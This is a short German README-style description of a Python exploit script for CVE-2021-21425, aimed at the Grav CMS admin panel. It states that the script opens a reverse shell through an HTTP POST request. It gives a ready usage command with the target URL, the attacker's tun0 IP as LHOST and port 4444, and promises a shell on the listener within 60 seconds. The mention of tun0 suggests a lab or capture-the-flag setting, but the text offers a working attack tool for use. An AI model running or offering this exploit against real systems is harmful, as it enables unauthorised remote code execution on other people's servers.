
Python-Exploit-Skript für CVE-2021-21425, das auf das Grav CMS Admin-Panel abzielt und eine Reverse-Shell über eine HTTP-POST-Anfrage mit konfigurierbarem LHOST und LPORT bereitstellt.
Dies ist meine Version, die ich im Internet gefunden habe, aber die anderen sind zu schlecht.
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
Warte.. 60 Sekunden und du bekommst eine Shell an deinem Listener.